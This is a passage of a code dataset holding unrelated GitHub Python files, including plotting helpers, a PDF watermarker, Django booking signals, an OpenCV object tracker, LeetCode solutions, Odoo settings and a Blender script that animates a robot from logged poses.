labels[i]\n else:\n label = None\n ax.plot(\n source[x_var], source[y_var], *args, label=label, **kwargs\n )\n\n\ndef plot_points_2d(\n source, x, y, s=None, c=None, cbar=False, fig=None, ax=None, **kwargs\n ):\n '''2d scatter plot'''\n if fig is None:\n fig = plt.gcf()\n if ax is None:\n ax = plt.gca()\n if c is not None:\n c_label = c\n c = source[c]\n else:\n assert not cbar\n if s is not None:\n if isinstance(s, str):\n s = source[s]\n sc = ax.scatter(\n np.array(source[x]),\n np.array(source[y]),\n s=np.array(s),\n c=np.array(c),\n **kwargs\n )\n if cbar:\n fig.colorbar(sc, ax=ax, label=c_label)\n ax.set_xlabel(x)\n ax.set_ylabel(y)\n return sc\n\n\ndef plot_contour(source, var=None, fig=None, ax=None, **kwargs):\n '''\n contours from gird data\n '''\n assert isinstance(source, (dm.GridData, dm.GridArray))\n assert source.grid.nax == 2\n\n if isinstance(source, dm.GridData):\n if var is None and len(source.data_vars) == 1:\n var = source.data_vars[0]\n data = np.ma.asarray(source[var])\n\n else:\n data = np.ma.asarray(source)\n\n\n\n if fig is None:\n fig = plt.gcf()\n if ax is None:\n ax = plt.gca()\n X, Y = source.grid.point_meshgrid\n\n labels = kwargs.pop('labels', None)\n inline = kwargs.pop('inline', True)\n\n cs = ax.contour(X, Y, data, **kwargs)\n\n if labels is not None:\n fmt = {}\n for l, s in zip(cs.levels, labels):\n fmt[l] = s\n\n ax.clabel(cs, cs.levels, inline=inline, fmt=fmt)\n\n if source.grid.axes[0].log:\n ax.set_xscale('log')\n if source.grid.axes[1].log:\n ax.set_yscale('log')\n\n return cs\n\n\ndef plot_errorband(source, var, errors, fig=None, ax=None, **kwargs):\n '''\n plot a step histogram with errorbars around it as bands\n '''\n if fig is None:\n fig = plt.gcf()\n if ax is None:\n ax = plt.gca()\n if isinstance(errors, (tuple, list)):\n lower_error = source[errors[0]]\n upper_error = source[errors[1]]\n elif isinstance(errors, str):\n lower_error = source[errors]\n upper_error = lower_error\n else:\n raise TypeError(\n 'errors must be tuple of variable names or a single variable name'\n )\n assert source.grid.nax == 1\n\n ax.bar(\n source.grid[0].points,\n lower_error + upper_error,\n bottom=source[var] - lower_error,\n width=source.grid[0].edges.width,\n **kwargs\n )\n ax.set_xlabel(source.grid[0].var)\n\n if source.grid.axes[0].log:\n ax.set_xscale('log')\n","repo_name":"philippeller/dama","sub_path":"dama/plotting/stat_plot.py","file_name":"stat_plot.py","file_ext":"py","file_size_in_byte":15938,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"15494428586","text":"import PyPDF2\n\ntemplate = 'C:\\\\Users\\\\JR0544\\\\PycharmProjects\\\\ZeroToMastery\\\\PDFs\\\\2020ViaBenefitsCostSummary.pdf'\nmarker = 'C:\\\\Users\\\\JR0544\\\\PycharmProjects\\\\ZeroToMastery\\\\PDFs\\\\original.pdf'\n\n# template = PyPDF2.PdfFileReader(open('C:\\\\Users\\\\JR0544\\\\PycharmProjects\\\\ZeroToMastery\\\\PDFs\\\\2020ViaBenefitsCostSummary.pdf', 'rb'))\n# marker = PyPDF2.PdfFileReader(open('C:\\\\Users\\\\JR0544\\\\PycharmProjects\\\\ZeroToMastery\\\\PDFs\\\\original.pdf', 'rb'))\n\"\"\"\noutput = PyPDF2.PdfFileWriter()\n\nfor i in range(template.getNumPages()):\n page = template.getPage(i)\n page.mergePage(marker.getPage(0))\n output.addPage(page)\n\nwith open('watermarker.pdf', 'wb') as file:\n output.write(file)\n\"\"\"\n\n\ndef pdf_watermarker(original, watermark):\n wtr_file = open(watermark, 'rb')\n\n original_file = open(original, 'rb')\n original_reader = PyPDF2.PdfFileReader(original_file)\n\n writer = 
PyPDF2.PdfFileWriter()\n\n    for original_page in original_reader.pages:\n        wtr_reader = PyPDF2.PdfFileReader(wtr_file)\n        wtr_page = wtr_reader.getPage(0)\n        wtr_page.mergePage(original_page)\n        writer.addPage(wtr_page)\n\n    with open('watermarker.pdf', 'wb') as file:\n        writer.write(file)\n    original_file.close()\n    wtr_file.close()\n\n\npdf_watermarker(template, marker)\n","repo_name":"jaggureddy/ZTM","sub_path":"ZeroToMastery/pdf/AddMarker.py","file_name":"AddMarker.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"31183616867","text":"import os\nimport time\nimport argparse\nimport sys\nimport multiprocessing\n\ndef read_file(filename, k):\n    start_time = time.time()\n    # Read file content into memory\n    with open(filename, 'rb') as file:\n        content = file.read()\n    file_size = sys.getsizeof(content)\n    end_time = time.time()\n    read_time = end_time - start_time\n    print(f\"[process {k}] file [{os.path.basename(filename)}] read time: {read_time:.2f} seconds, size: {file_size / (1024*1024)} MB\")\n    return read_time\n\ndef read_files_in_folder(folder_path, k, N):\n    for filename in os.listdir(folder_path)[k::N]:\n        full_filepath = os.path.join(folder_path, filename)\n        if os.path.isfile(full_filepath):\n            read_file(full_filepath, k)\n\nif __name__ == \"__main__\":\n    # usage: python this.py --path /your/file/path --task number_of_processes\n\n    parser = argparse.ArgumentParser(description='File Read Time Test')\n    parser.add_argument('--path', type=str, help='Path of the folder to read')\n    parser.add_argument('--task', type=int, help='Number of processes')\n    args = parser.parse_args()\n    N = args.task\n    folder_path = args.path\n\n    processes = []\n    for k in range(N):\n        p = multiprocessing.Process(target=read_files_in_folder, args=(folder_path, k, N))\n        processes.append(p)\n        p.start()\n\n    for p in processes:\n        p.join()","repo_name":"TangJicheng123/tools","sub_path":"py/read_test.py","file_name":"read_test.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"22429342802","text":"from django.db.models.signals import post_save\nfrom datetime import datetime\nfrom django.db.models.signals import pre_delete\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import Group\n\nfrom prenotazioni.models import Cancellazione, Paglione, Prenotazione\n\n\n@receiver(pre_delete, sender=Prenotazione)\ndef send_notification(sender, instance, **kwargs):\n\n    # if the booking about to be deleted is the first one in the queue\n    if instance.primo_priorità():\n        prossimi = Prenotazione.objects.filter(ora_prenotata=instance.ora_prenotata,\n                                               paglione=instance.paglione).order_by('priorità')\n        # if there is a second user waiting in the queue\n        if len(prossimi) > 1:\n            message = \"Paglione no.\" + str(\n                instance.paglione.id) + \" that you booked for \" + str(instance.ora_prenotata) + \" is now free!\"\n            cancellazione = Cancellazione.objects.create(\n                messaggio=message, utente=prossimi[1].utente, ora_creazione=datetime.now())\n            cancellazione.save()\n\n\n@receiver(post_save, sender=Paglione)\ndef elimina_prenotazioni_paglione_non_attivo(sender, instance, **kwargs):\n    if not instance.attivo:\n        prenotazioni = instance.prenotazioni.all()\n        # check to remove any student bookings linked to the teacher bookings now being deleted\n        for prenotazione in prenotazioni:\n            if prenotazione.utente.groups.filter(name='Maestri').exists():\n                prenotazioni_allievi = Prenotazione.objects.filter(\n                    ora_prenotata=prenotazione.ora_prenotata, utente__groups=Group.objects.get(name='Allievi'))\n                prenotazioni_allievi.delete()\n        prenotazioni.delete()\n","repo_name":"noceg43/tec-web","sub_path":"progetto/campo/prenotazioni/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"71122125330","text":"#!/usr/bin/env python\n\n'''\nWelcome to the Object Tracking Program!\n\nUsing real-time streaming video from your built-in webcam, this program:\n  - Creates a bounding box around a moving object\n  - Calculates the coordinates of the centroid of the object\n  - Tracks the centroid of the object\n\nAuthor:\n  - Addison Sears-Collins\n  - https://automaticaddison.com\n'''\n\nfrom __future__ import print_function # Python 2/3 compatibility\nimport cv2 # Import the OpenCV library\nimport numpy as np # Import Numpy library\n\n# Project: Object Tracking\n# Author: Addison Sears-Collins\n# Website: https://automaticaddison.com\n# Date created: 06/13/2020\n# Python version: 3.7\n\ndef main():\n\n    cap = cv2.VideoCapture(0) # Create a VideoCapture object\n\n    # Create the background subtractor object. Use the last 700 video frames to build the background\n    back_sub = cv2.createBackgroundSubtractorMOG2(history=700, varThreshold=25, detectShadows=True)\n\n    # Create kernel for morphological operation.\n    # You can tweak the dimensions of the kernel e.g. instead of 20,20 you can try 30,30.\n    kernel = np.ones((20,20),np.uint8)\n\n    while(True):\n\n        ret, frame = cap.read() # Capture frame-by-frame. 
This method returns True/False as well as the video frame.\n print(ret,frame)\n\n # Find the index of the largest contour and draw bounding box\n fg_mask_bb = create_fg_mask(back_sub, frame, kernel)\n contours, hierarchy = cv2.findContours(fg_mask_bb,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)[-2:]\n areas = [cv2.contourArea(c) for c in contours]\n\n # If there are countours\n if len(areas) > 0:\n max_index = np.argmax(areas) # Find the largest moving object in the image\n cnt = contours[max_index]\n highlight_contour(cnt, frame)\n display_frame(frame)\n\n # Close down the video stream\n cap.release()\n cv2.destroyAllWindows()\n\n\ndef highlight_contour(cnt, frame):\n x, y, w, h = cv2.boundingRect(cnt)\n cx = x + int(w / 2)\n cy = y + int(h / 2)\n draw_bounding_box(frame, h, w, x, y)\n draw_circle_in_box(cx, cy, frame)\n print_coordinates(cx, cy, frame)\n\ndef draw_bounding_box(frame, h, w, x, y):\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)\n\ndef display_frame(frame):\n cv2.imshow('frame', frame)\n cv2.waitKey(1)\n\ndef create_fg_mask(back_sub, frame, kernel):\n fg_mask = back_sub.apply(frame) # Use every frame to calculate the foreground mask and update the background\n fg_mask = cv2.morphologyEx(fg_mask, cv2.MORPH_CLOSE, kernel) # Close dark gaps in foreground object using closing\n fg_mask = cv2.medianBlur(fg_mask, 5) # Remove salt and pepper noise with a median filter\n _, fg_mask = cv2.threshold(fg_mask, 127, 255, cv2.THRESH_BINARY) # Threshold the image to make it either black or white\n return fg_mask\n\n\n# Print the centroid coordinates (we'll use the center of the bounding box) on the image\ndef print_coordinates(cx, cy, frame):\n text = \"x: \" + str(cx) + \", y: \" + str(cy)\n cv2.putText(frame, text, (cx - 10, cy - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n\n\n# Draw circle in the center of the bounding box\ndef draw_circle_in_box(cx, cy, frame):\n cv2.circle(frame, (cx, cy), 4, (0, 255, 0), -1)\n\n\nif __name__ == '__main__':\n print(__doc__)\n main()\n","repo_name":"curtcox/opencv-experiments","sub_path":"tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26789800380","text":"# https://leetcode.com/problems/number-of-longest-increasing-subsequence/\n# https://www.youtube.com/watch?v=Tuc-rjJbsXU&list=PLot-Xpze53lcvx_tjrr_m2lgD2NsRHlNO&index=42\n\n# My Solution with DP : \n\nclass Solution:\n def findNumberOfLIS(self, nums: List[int]) -> int:\n dp = {}\n a = [1] * (len(nums))\n def recurse(i):\n if i>=len(nums):\n return 0\n if i in dp:\n return dp[i]\n \n Max = 1\n count = 1\n for j in range(i+1,len(nums)):\n if nums[i] < nums[j]:\n temp = 1 + recurse(j)\n if temp == Max:\n count += a[j]\n if temp > Max:\n Max = temp\n count = a[j]\n \n a[i] = count\n dp[i] = Max\n return dp[i]\n \n for i in range(len(nums)):\n recurse(i)\n \n b = []\n MaxLength = max(dp.values())\n for i,j in dp.items():\n if j == MaxLength:\n b.append(i)\n count = 0\n for i in b:\n count += a[i]\n return count\n \n# Solution with DP : \nclass Solution:\n def findNumberOfLIS(self, nums: List[int]) -> int:\n # 1. 
O(n^2) Recursive solution with Caching\n \n dp = {} # key = index, value = [length of LIS, count]\n lenLIS, res = 0, 0 # length of LIS, count of LIS\n \n def dfs(i):\n if i in dp: return dp[i]\n \n maxLen, maxCnt = 1, 1 # length and count of LIS\n for j in range(i + 1, len(nums)):\n if nums[j] > nums[i]: # make sure increasing order\n length, count = dfs(j)\n if length + 1 > maxLen:\n maxLen, maxCnt = length + 1, count\n elif length + 1 == maxLen:\n maxCnt += count \n nonlocal lenLIS, res\n if maxLen > lenLIS:\n lenLIS, res = maxLen, maxCnt\n elif maxLen == lenLIS:\n res += maxCnt\n dp[i] = [maxLen, maxCnt]\n return dp[i]\n\n for i in range(len(nums)): dfs(i)\n return res\n\n# Solution with pure DP : \nclass Solution:\n def findNumberOfLIS(self, nums: List[int]) -> int:\n # 2. O(n^2) Dynamic Programming \n \n dp = {} # key = index, value = [length of LIS, count]\n lenLIS, res = 0, 0 # length of LIS, count of LIS\n \n # i = start of subseq\n for i in range(len(nums) - 1, -1, -1):\n maxLen, maxCnt = 1, 1 # len, cnt of LIS start from i\n \n for j in range(i + 1, len(nums)):\n if nums[j] > nums[i]:\n length, count = dp[j] # len, cnt of LIS start from j\n if length + 1 > maxLen:\n maxLen, maxCnt = length + 1, count\n elif length + 1 == maxLen:\n maxCnt += count\n if maxLen > lenLIS:\n lenLIS, res = maxLen, maxCnt\n elif maxLen == lenLIS:\n res += maxCnt\n dp[i] = [maxLen, maxCnt]\n \n return res","repo_name":"OnkarNora/Dynamic-Programming-Leetcode","sub_path":"673-Number_Of_Longest_Increasing_Subsequences.py","file_name":"673-Number_Of_Longest_Increasing_Subsequences.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16012614043","text":"#!/usr/bin/python\nif __name__ == '__main__':\n import tdc_vis\n\nimport os\n\nfrom ATvis.Common_Data_Plot import *\n\nfrom Auxiliary import *\nfrom Common_Data_Plot import *\nfrom x_PlottingFunctions import *\nfrom Movie import Movie_Interface_Selector\n\n\n\n# ============================================================\n# Figure Style Parameters\n# ============================================================\nfig_param = paramSingleFig_Presentation\n## fig_param = None\n\n\n# ============================================================\n# Directory\n# ============================================================\n# tdc_Filenames.set_results_dir('../RESULTS/WD')\ntdc_Filenames.set_results_dir('../RESULTS/WD/RS')\n## tdc_Filenames.set_results_dir('../RESULTS/WD/RS_2')\ntdc_Filenames.set_results_dir('../RESULTS/WD/TDC_Presentation')\n\n\ntdc_Filenames.set_vis_results_dir('../RESULTS_VIS/TDC_Presentation')\n\n# ============================================================\n# IDs \n# ============================================================\n# ID=['RS__R6_jp0.5_P0.2_L0.3_nGJ5e4_nx5e3_dt2e-5_sU']\n\nID=['RS__R6_jp0.5_P0.2_L0.3_nGJ5e4_nx5e3_dt2e-5_sU__wave']\n\n\n# ============================================================\n# plot limits:\n# ============================================================\nxlims = [[-0.005,0.305],[-0.005,0.305]]\n\nylims_xp_e = [[-5e8,5e8],[-.15,0.32]]\n\n\naxes_commands_xp = [['set_yticks([-1e8,-1e4,0,1e4,1e8])',\n 'set_xticks([0,0.1,0.2, 0.3])',\n 'xaxis.set_ticklabels([])'],\n ['set_yticks([0,0.2])',\n 'set_yticks([-0.1,0.1,0.3],minor=True)',\n 'set_xticks([0,0.1,0.2, 0.3])']]\n## axes_commands_xp = None\n# ----------------------------------------\n\n\n\nsample_dict = dict(name='regular',n_reduce=1,n_min=1000)\n## sample_dict 
= dict(name='regular',n_reduce=20,n_min=3000)\n\nparticle_names = ['Positrons','Electrons','Pairs']\n\nsymlog=True\nlinthreshy=5\n\ntt = None\ntt = [12.253,12.633]\n\nfps = 24\nkeep_frame_files=True\n\nuse_cell_coordinates=False\nshow_cells=False\nghost_points=False\n\n# moving_grid_dict = None\nmoving_grid_dict = dict(n_lines=20, speed=1)\n# ==================\n\n\n\ndef do_movie(ID):\n # select interface\n interface = Movie_Interface_Selector()\n \n tdc_plot_wave_xp_e_movie(interface.movie_module,\n ID,\n particle_names,\n ylims=ylims_xp_e,\n xlims=xlims,\n sample_dict=sample_dict,\n tt=tt,\n fps=fps,\n keep_frame_files=keep_frame_files,\n use_cell_coordinates=use_cell_coordinates,\n show_cells=show_cells,\n moving_grid_dict=moving_grid_dict,\n symlog=symlog,\n linthreshy=linthreshy,\n axes_commands = axes_commands_xp,\n xlabel=None,ylabel=None,idlabel=None,\n fig_param = fig_param,\n plot_style={'linewidth':2})\n\n \nif __name__ == \"__main__\":\n do_movie(ID)\n","repo_name":"atimokhin/tdc_vis","sub_path":"_working/rs/make_movie_wave.py","file_name":"make_movie_wave.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33511588516","text":"from odoo import api, fields, models\n\n\nclass HrLeaveConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n alias_prefix = fields.Char(string='Default Alias Name for Leave', help='Default Alias Name for Leave')\n alias_domain = fields.Char(string='Alias Domain', help='Default Alias Domain for Leave',\n default=lambda self: self.env[\"ir.config_parameter\"].get_param(\"mail.catchall.domain\"))\n\n def set_values(self):\n super(HrLeaveConfigSettings, self).set_values()\n set_param = self.env['ir.config_parameter'].set_param\n set_param('alias_prefix', self.alias_prefix)\n set_param('alias_domain', self.alias_domain )\n\n @api.model\n def get_values(self):\n res = super(HrLeaveConfigSettings, self).get_values()\n get_param = self.env['ir.config_parameter'].sudo().get_param\n res.update(\n alias_prefix=get_param('alias_prefix', default=''),\n alias_domain=get_param('alias_domain', default=''),\n )\n return res\n\n","repo_name":"cybergate-services/cybererp","sub_path":"custom-addons/hr_leave_request_aliasing/models/res_config.py","file_name":"res_config.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"38218077079","text":"\"\"\"\nGiven an array of size n, find the majority element. The majority element is the element that appears more than ⌊ n/2 ⌋ times.\n\nYou may assume that the array is non-empty and the majority element always exist in the array.\n\nSolutions:\n\n1. Dictionary\nCreate a dict with number as key and count as value\nStore the max(d.values()) in a var\nIterate over the dict and return the key, if d[key] == max(d.values())\n\n2. Using count keyword - but this would lead to time limit exceeded error if the array is really huge\n\n3. No extra space 0(n) time \nHave 2 variables, major and count = 0.\nIterate over the list. We know that majority element will be present more than 50% times in the array.\nIf count == 0, then set majority element as current num\nelse if count >0 and if current num != majority element, decrement count\nelse, increment count\n\n4. 
Got few more ideas from here:\nhttps://discuss.leetcode.com/topic/17446/6-suggested-solutions-in-c-with-explanations/2\n\n\"\"\"\n\nclass Solution(object):\n def majorityElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n \n count = 0\n for num in nums:\n if not count:\n major = num\n count += 1\n \n elif count > 0 and num != major:\n count -= 1\n \n else:\n count += 1\n \n return major\n \n \n \"\"\"\n d = {}\n \n for i in nums:\n if i not in d:\n d[i] = 1\n else:\n d[i] += 1\n \n count = max(d.values())\n for k,v in d.items():\n if d[k] == count:\n return k\n \"\"\"\n \n \"\"\" \n # Solution 2\n\n for num in nums:\n if nums.count(num) > len(nums)/2:\n return num\n \"\"\"","repo_name":"sjayster/Leetcode","sub_path":"majority-element.py","file_name":"majority-element.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36119226096","text":"from models.detalle_orden import Detalle_Orden\nfrom models.producto import Producto\nfrom models.orden import Orden\n\nclass Detalle_Orden_Controller(Orden):\n def __init__(self):\n self.detalle_orden = Detalle_Orden()\n self.producto = Producto()\n self.orden = Orden()\n self.close = False\n\n def read_products(self):\n productos = self.producto.read_products()\n\n if productos:\n print(\"ID PRODUCTO NOMBRE PRODUCTO MARCA DESCRIPCION PRECIO\")\n print(\"-------------------------------------------------------------------------------\")\n for i in productos:\n print(f\"{i[0]}\\t {i[1].ljust(20)}{i[2].ljust(16)}{i[3].ljust(20)}{i[4]}\")\n\n \n def detail_order(self,id_orden,id_producto,cantidad_producto,total_producto,total):\n detail_order = self.detalle_orden.read_detail_order()\n\n if detail_order:\n print(\"\\n\")\n print(\"\\nID ORDEN ID PRODUCTO ID CLIENTE CANT. PRODUCTO TOTAL POR PRODUCTO STATUS FECHA TOTAL\")\n print(\"---------------------------------------------------------------------------------------------------------------------------------------\")\n for i in detail_order:\n print(f\"{i[0]}\\t {i[1]}\\t {i[2]}\\t {i[3]}\\t {i[4]}\\t {i[5]}\\t {i[6]}\\t{i[4]}\")\n print(\"---------------------------------------------------------------------------------------------------------------------------------------\")\n print(\"TOTAL PAGAR: \",total)\n\n def create_detail_order(self,id_orden,id_producto,cantidad_producto,total_producto,total):\n self.detalle_orden.id_orden = id_orden\n self.detalle_orden.id_producto = id_producto\n self.detalle_orden.cantidad_producto = cantidad_producto\n self.detalle_orden.total_producto = total_producto\n\n self.detalle_orden.create_a_details_order()\n self.detail_order(id_orden,id_producto,cantidad_producto,total_producto,total)\n \"\"\"productos = self.producto.read_products()\n print(id_orden)\n self.detalle_orden.id_orden = id_orden\n total_producto = 0.0\n if type(id_orden) == int:\n id_producto = ' '\n while id_producto != '':\n id_producto = int(input(\"Elija producto por su ID: \"))\n self.detalle_orden.id_producto = id_producto\n for i in productos:\n if i[0] == id_producto:\n precio = i[4]\n cantidad_producto = int(input(\"Ingrese cantidad: \"))\n self.detalle_orden.cantidad_producto = cantidad_producto\n\n precio_cantidad = precio * cantidad_producto\n total_producto = precio_cantidad \n\n self.detalle_orden.total_producto = total_producto\n \n respuesta = input(\"Seguira ingresando mas productos? 
Y/N:\")\n if respuesta == 'Y' or respuesta == 'y':\n self.detalle_orden.create_a_details_order()\n pass\n elif respuesta == 'N' or respuesta == 'n':\n self.detalle_orden.create_a_details_order()\n self.detail_order(total)\n \"self.detalle_orden.update_a_details_order()\"\n break \n else:\n print(\"No se pudo crear orden. Revisa.\")\n\"\"\"","repo_name":"mariotorres94/Hackaton---7","sub_path":"controller/detalle_orden_controller.py","file_name":"detalle_orden_controller.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1373857316","text":"import bpy\n# import rosbag\nimport os\nimport glob\nimport numpy as np\nimport pandas as pd\nimport time\nimport cv2\nimport matplotlib.pyplot as plt \n\nfrom geometry_msgs.msg import PoseStamped, Pose\n\n# Define vertices and faces\nverts = [(0, 0, 0), (0, 5, 0), (5, 5, 0), (5, 0, 0)]\nfaces = [(0, 1, 2, 3)]\n\nMAP_NAME = 'flat'\n\nMAP_KEY = 'Grid'\nMAP_PATH = '/home/francesco/Documents/Master-Thesis/core/maps/{}.png'.format(MAP_NAME)\nTEX_NAME = 'Texture'\nMAT_NAME = 'Mat'\n\nbpy.context.scene.unit_settings.system = 'METRIC'\nbpy.context.scene.render.engine = 'CYCLES'\n# bpy.context.scene.cycles.feature_set = 'EXPERIMENTAL'\n# bpy.context.scene.cycles.device = 'GPU'\n\ntop_cam = bpy.data.cameras.new(\"Camera\")\ntop_cam_ob = bpy.data.objects.new(\"Camera\", top_cam)\nbpy.context.scene.objects.link(top_cam_ob)\n\ntop_cam_ob.location = [0,0,15]\ntop_cam_ob.rotation_euler = [0,0,0]\n\nbpy.context.scene.camera = top_cam_ob\n\nprint(list(bpy.data.objects))\nkrock = bpy.data.objects['krock']\nkrock.name = 'krock'\nkrock.scale = [0.2, 0.2, 0.2]\n\n\n\nif MAP_KEY not in bpy.data.objects:\n bpy.ops.mesh.primitive_grid_add(x_subdivisions=513, y_subdivisions=513)\n\nlamp = bpy.data.lamps['Lamp'].type = 'HEMI'\n\nmap = bpy.data.objects[MAP_KEY]\nimage = cv2.imread(MAP_PATH)\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\nif image.dtype == 'uint8':\n image = image / 256.\nif image.dtype == 'uint16':\n image = image / 65536.\nif image.dtype == 'uint32':\n image = image / 4294967296.\n\nprint(np.max(image))\nmap.location = [map.location[0], map.location[1], map.location[2] - np.max(image)]\n\nscale = (513 * 0.02) / 2\n\nmap.scale = (scale, scale, scale)\nmap.location = [map.location[0], map.location[1], map.location[2]]\n# map.rotation_euler = [0,0, np.radians(90)]\n# create texture\ntex = bpy.data.textures.new(TEX_NAME, 'IMAGE')\nimage = bpy.data.images.load(MAP_PATH)\ntex.image = image\n\nmaterial = bpy.data.materials.new(MAT_NAME)\n# add texture to material\nslot = bpy.data.materials[MAT_NAME].texture_slots.add()\nslot.texture = tex\nbpy.data.materials[MAT_NAME].active_texture = tex\n# create modifier\nmod = map.modifiers.new(\"disp\", 'DISPLACE')\nmod.texture = tex\nmod.mid_level = 0\n\nmat = bpy.data.materials.new('bricks')\n\nmap.data.materials.append(mat)\nmat.use_nodes = True\n\n# create the texture node\ntree = mat.node_tree\n\nlinks = tree.links\ntext_brick = tree.nodes.new(type='ShaderNodeTexBrick')\n\ntext_brick.offset = 0\n\ntext_brick.inputs[1].default_value = [0.471, 0.643, 0.694, 1]\ntext_brick.inputs[2].default_value = [0.471, 0.643, 0.694, 1]\ntext_brick.inputs[3].default_value = [1, 1, 1, 1]\n\ntext_brick.inputs[4].default_value = 1.0\ntext_brick.inputs[5].default_value = 0.0005\ntext_brick.inputs[6].default_value = 0\ntext_brick.inputs[8].default_value = 0.01\ntext_brick.inputs[9].default_value = 0.01\n\ndiff = tree.nodes['Diffuse BSDF']\n# 
connect to our material\nlinks.new(text_brick.outputs[0], diff.inputs[0])\n\n# bpy.ops.object.modifier_add(type=\"DISPLACE\")\n\ncamera = bpy.data.objects['Camera']\n\nBAG_FOLDER = '/home/francesco/Desktop/carino/vaevictis/data/dataset/'\nfiles = glob.glob(BAG_FOLDER + '/{}/*.csv'.format(MAP_NAME))\n\ndef msg2pose(msg):\n position = msg.pose.position\n orientation = msg.pose.orientation\n\n return [[position.x, position.y, position.z],\n [orientation.w, orientation.x, orientation.y, orientation.z]]\n\ndef bag2pose(file_path):\n bag = rosbag.Bag(file_path)\n for i, (topic, msg, t) in enumerate(bag.read_messages(topics=['pose'])):\n yield msg2pose(msg)\n\ndef csv2pose(file_path):\n df = pd.read_csv(file_path)\n for index, row in df.iterrows():\n position = row['pose__pose_position_x'], row['pose__pose_position_y'], row['pose__pose_position_z']\n orientation = row['pose__pose_orientation_x'], row['pose__pose_orientation_y'], row['pose__pose_orientation_z'], row['pose__pose_orientation_w']\n advancement = row['advancement']\n\n advancement = np.clip(advancement, 0, 0.16)\n\n yield position, orientation, advancement/ 0.16\n\ndef pose(file_path):\n filename, file_extension = os.path.splitext(file_path)\n if file_extension == '.bag':\n pose = bag2pose(file_path)\n elif file_extension == '.csv':\n pose = csv2pose(file_path)\n return pose\n\ncamera = bpy.data.cameras['Camera']\ncamera.lens_unit = 'FOV'\ncamera.angle = 1.05\n\nscene = bpy.context.scene\n\nscene.cycles.samples = 32\nscene.render.resolution_x = 640\nscene.render.resolution_y = 480\ncamera = bpy.data.objects['Camera']\n\ncamera.parent = krock\n\nprint(files[0])\nframe_idx = 0\nskip = 10\n\nbpy.context.scene.objects.active = krock\n\nkrock_mat = krock.data.materials[0]\nkrock_mat.use_nodes = True\ntree = krock_mat.node_tree\nlinks = tree.links\n# text_brick = tree.nodes.new(type='DiffuseBSDF')\ndiff = tree.nodes['Diffuse BSDF']\n# connect to our material\n\n\ncmap = plt.cm.get_cmap('Spectral')\n\nfor file in files:\n for i, (position, orientation, advancement) in enumerate(pose(file)):\n if i % skip == 0:\n krock.location = position\n krock.rotation_quaternion = orientation\n # print(advancement)\n diff.inputs[0].default_value = cmap(advancement)\n diff.inputs[0].keyframe_insert(data_path=\"default_value\", frame=frame_idx)\n krock.keyframe_insert(data_path=\"location\", frame=frame_idx)\n frame_idx += 1\n\n # print(position, orientation)\n \n # time.sleep(1)\n # break\n # bpy.context.scene.render.filepath = \"/home/francesco/Desktop/diocane/{}.jpg\".format(i)\n # bpy.ops.render.render(use_viewport = True, write_still=True)\n\nbpy.context.scene.render.image_settings.file_format='JPEG'\n\nbpy.context.scene.render(animation=True)\n# bpy.context.scene.render.filepath = \"/home/francesco/Desktop/diocane/{}.jpg\".format(i)\n\n\n# camera.parent = krock\n\n# krock.location = [1.0, 0.33, -0.165]\n# krock.rotation_mode = 'QUATERNION'\n# krock.rotation_quaternion = [0.98, 0.14, -0.0, -0.03]\n\n# camera.location = [0.16, 0, 0]","repo_name":"FrancescoSaverioZuppichini/Master-Thesis","sub_path":"core/blender/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"20309251509","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 17 16:36:49 2023\n\n@author: chaol\n\nNOTE: \n GLOBAL_VARIABLE\n local_variable\n functionToRun\n Function_Input_Or_Ouput_Variable\n \n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\nfrom 
